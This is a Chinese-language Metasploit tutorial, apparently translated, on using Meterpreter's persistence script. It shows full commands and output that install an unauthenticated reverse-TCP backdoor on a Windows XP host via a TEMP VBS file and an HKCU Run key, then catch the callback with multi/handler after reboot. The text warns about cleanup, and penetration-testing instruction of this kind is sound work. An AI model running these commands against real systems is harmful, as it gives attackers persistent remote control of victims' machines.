了解METASPLOIT METERPRETER
在完成了开发系统的所有艰苦工作之后,通常最好将自己放回到系统中以供以后使用。这样,如果您最初利用的服务已关闭或打补丁,您仍然可以访问系统。Metasploit有一个Meterpreter脚本persistence.rb,它将创建一个Meterpreter服务,即使重新启动远程系统,该服务也可以使用。
在继续进行任何操作之前,这里先警告一句。此处显示的持久化Meterpreter不需要身份验证。这意味着任何获得该端口访问权限的人都可以访问您的后门!如果您正在进行渗透测试,这不是一件好事,因为这可能会带来很大的风险。在现实世界中,请务必格外小心,并在订婚后一定要自己清理。
最初利用主机后,我们使用-h开关运行持久性以查看哪些选项可用:
meterpreter > run persistence -h [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] Meterpreter Script for creating a persistent backdoor on a target host. OPTIONS: -A Automatically start a matching exploit/multi/handler to connect to the agent -L Location in target host to write payload to, if none %TEMP% will be used. -P Payload to use, default is windows/meterpreter/reverse_tcp. -S Automatically start the agent on boot as a service (with SYSTEM privileges) -T Alternate executable template to use -U Automatically start the agent when the User logs on -X Automatically start the agent when the system boots -h This help menu -i The interval in seconds between each connection attempt -p The port on which the system running Metasploit is listening -r The IP of the system running Metasploit listening for the connect back
我们将配置持续的Meterpreter会话,以等待用户登录到远程系统,并尝试每5秒在端口443的IP地址192.168.1.71上重新连接回我们的侦听器。
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.71 [*] Creating a persistent agent: LHOST=192.168.1.71 LPORT=443 (interval=5 onboot=true) [*] Persistent agent script is 613976 bytes long [*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs [*] Agent executed with PID 492 [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr [*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc meterpreter >
请注意,脚本输出为您提供了在完成后删除持久性侦听器的命令。确保记下它,以免在系统上留下未经身份验证的后门。为了验证它是否有效,我们重新启动远程系统并设置有效负载处理程序。
meterpreter > reboot Rebooting... meterpreter > exit [*] Meterpreter session 3 closed. Reason: User exit msf exploit(ms08_067_netapi) > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.71 LHOST => 192.168.1.71 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.1.71:443 [*] Starting the payload handler...
当用户登录到远程系统时,将为我们打开一个Meterpreter会话。
[*] Sending stage (748544 bytes) to 192.168.1.161 [*] Meterpreter session 5 opened (192.168.1.71:443 -> 192.168.1.161:1045) at 2010-08-21 12:31:42 -0600 meterpreter > sysinfo Computer: XEN-XP-SP2-BARE OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US meterpreter >